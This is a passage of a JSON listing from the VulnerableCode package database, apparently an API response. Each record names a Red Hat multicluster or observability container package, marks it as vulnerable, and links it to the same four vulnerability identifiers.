:rpm/redhat/insights-metrics@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89303?format=json","purl":"pkg:rpm/redhat/klusterlet-addon-controller@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/klusterlet-addon-controller@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89324?format=json","purl":"pkg:rpm/redhat/kube-rbac-proxy@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/kube-rbac-proxy@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89277?format=json","purl":"pkg:rpm/redhat/kube-state-metrics@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/kube-state-metrics@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89305?format=json","purl":"pkg:rpm/redhat/memcached-exporter@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/memcached-exporter@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89326?format=json","purl":"pkg:rpm/redhat/metrics-collector@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/metrics-collector@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89351?format=json","purl":"pkg:rpm/redhat/multicloud-integrations@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicloud-integrations@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89302?format=json","purl":"pkg:rpm/redhat/multicluster-engine-addon-manager@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-addon-manager@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89344?format=json","purl":"pkg:rpm/redhat/multicluster-engine-assisted-image-service@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-image-service@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89317?format=json","purl":"pkg:rpm/redhat/multicluster-engine-assisted-installer@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-installer@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89340?format=json","purl":"pkg:rpm/redhat/multicluster-engine-assisted-installer-agent@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-installer-agent@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89320?format=json","purl":"pkg:rpm/redhat/multicluster-engine-assisted-installer-controller@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-installer-controller@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89310?format=json","purl":"pkg:rpm/redhat/multicluster-engine-assisted-service-8@container-v2.7?arch=6-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-service-8@container-v2.7%3Farch=6-2"},{"url":"http://public2.vulnerablecode.io/api/packages/89329?format=json","purl":"pkg:rpm/redhat/multicluster-engine-assisted-service-9@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-assisted-service-9@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89345?format=json","purl":"pkg:rpm/redhat/multicluster-engine-cluster-api-provider-agent@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-api-provider-agent@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89347?format=json","purl":"pkg:rpm/redhat/multicluster-engine-cluster-api-provider-kubevirt@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-api-provider-kubevirt@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89304?format=json","purl":"pkg:rpm/redhat/multicluster-engine-clusterclaims-controller@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-clusterclaims-controller@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89298?format=json","purl":"pkg:rpm/redhat/multicluster-engine-cluster-curator-controller@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-curator-controller@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89274?format=json","purl":"pkg:rpm/redhat/multicluster-engine-cluster-image-set-controller@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-image-set-controller@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89282?format=json","purl":"pkg:rpm/redhat/multicluster-engine-clusterlifecycle-state-metrics@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-clusterlifecycle-state-metrics@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89283?format=json","purl":"pkg:rpm/redhat/multicluster-engine-cluster-proxy@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-proxy@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89311?format=json","purl":"pkg:rpm/redhat/multicluster-engine-cluster-proxy-addon@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-proxy-addon@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89341?format=json","purl":"pkg:rpm/redhat/multicluster-engine-console-mce@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-console-mce@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89349?format=json","purl":"pkg:rpm/redhat/multicluster-engine-discovery-operator@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-discovery-operator@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89286?format=json","purl":"pkg:rpm/redhat/multicluster-engine-hive@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hive@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89322?format=json","purl":"pkg:rpm/redhat/multicluster-engine-hypershift-addon-operator@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hypershift-addon-operator@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89318?format=json","purl":"pkg:rpm/redhat/multicluster-engine-hypershift-cli@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hypershift-cli@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89315?format=json","purl":"pkg:rpm/redhat/multicluster-engine-hypershift-operator@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hypershift-operator@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89293?format=json","purl":"pkg:rpm/redhat/multicluster-engine-image-based-install@container-v2.7?arch=6-11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-image-based-install@container-v2.7%3Farch=6-11"},{"url":"http://public2.vulnerablecode.io/api/packages/89321?format=json","purl":"pkg:rpm/redhat/multicluster-engine-kube-rbac-proxy-mce@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-kube-rbac-proxy-mce@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89309?format=json","purl":"pkg:rpm/redhat/multicluster-engine-managedcluster-import-controller@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-managedcluster-import-controller@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89299?format=json","purl":"pkg:rpm/redhat/multicluster-engine-managed-serviceaccount@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-managed-serviceaccount@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89332?format=json","purl":"pkg:rpm/redhat/multicluster-engine-multicloud-manager@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-multicloud-manager@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89319?format=json","purl":"pkg:rpm/redhat/multicluster-engine-must-gather@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-must-gather@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89312?format=json","purl":"pkg:rpm/redhat/multicluster-engine-operator@container-v2.7?arch=6-5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-operator@container-v2.7%3Farch=6-5"},{"url":"http://public2.vulnerablecode.io/api/packages/89328?format=json","purl":"pkg:rpm/redhat/multicluster-engine-operator-bundle@container-v2.7?arch=6-9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-operator-bundle@container-v2.7%3Farch=6-9"},{"url":"http://public2.vulnerablecode.io/api/packages/89280?format=json","purl":"pkg:rpm/redhat/multicluster-engine-placement@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-placement@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89336?format=json","purl":"pkg:rpm/redhat/multicluster-engine-provider-credential-controller@container-v2.7?arch=6-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-provider-credential-controller@container-v2.7%3Farch=6-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89323?format=json","purl":"pkg:rpm/redhat/multicluster-engine-registration@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-registration@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89288?format=json","purl":"pkg:rpm/redhat/multicluster-engine-registration-operator@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-registration-operator@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89276?format=json","purl":"pkg:rpm/redhat/multicluster-engine-work@container-v2.7?arch=6-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-work@container-v2.7%3Farch=6-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89313?format=json","purl":"pkg:rpm/redhat/multiclusterhub-operator@container-v2.12?arch=5-5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multiclusterhub-operator@container-v2.12%3Farch=5-5"},{"url":"http://public2.vulnerablecode.io/api/packages/89292?format=json","purl":"pkg:rpm/redhat/multicluster-observability-operator@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-observability-operator@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89346?format=json","purl":"pkg:rpm/redhat/multicluster-operators-application@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-operators-application@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89301?format=json","purl":"pkg:rpm/redhat/multicluster-operators-channel@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-operators-channel@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89295?format=json","purl":"pkg:rpm/redhat/multicluster-operators-subscription-operator@container-v2.12?arch=5-5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-operators-subscription-operator@container-v2.12%3Farch=5-5"},{"url":"http://public2.vulnerablecode.io/api/packages/89335?format=json","purl":"pkg:rpm/redhat/node-exporter@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/node-exporter@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89348?format=json","purl":"pkg:rpm/redhat/observatorium@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/observatorium@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89285?format=json","purl":"pkg:rpm/redhat/observatorium-operator@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/observatorium-operator@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89287?format=json","purl":"pkg:rpm/redhat/prometheus@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/prometheus@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89279?format=json","purl":"pkg:rpm/redhat/prometheus-alertmanager@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/prometheus-alertmanager@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89331?format=json","purl":"pkg:rpm/redhat/rbac-query-proxy@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rbac-query-proxy@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89325?format=json","purl":"pkg:rpm/redhat/search-collector@container-v2.12?arch=5-5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/search-collector@container-v2.12%3Farch=5-5"},{"url":"http://public2.vulnerablecode.io/api/packages/89306?format=json","purl":"pkg:rpm/redhat/submariner-addon@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/submariner-addon@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89327?format=json","purl":"pkg:rpm/redhat/thanos@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.i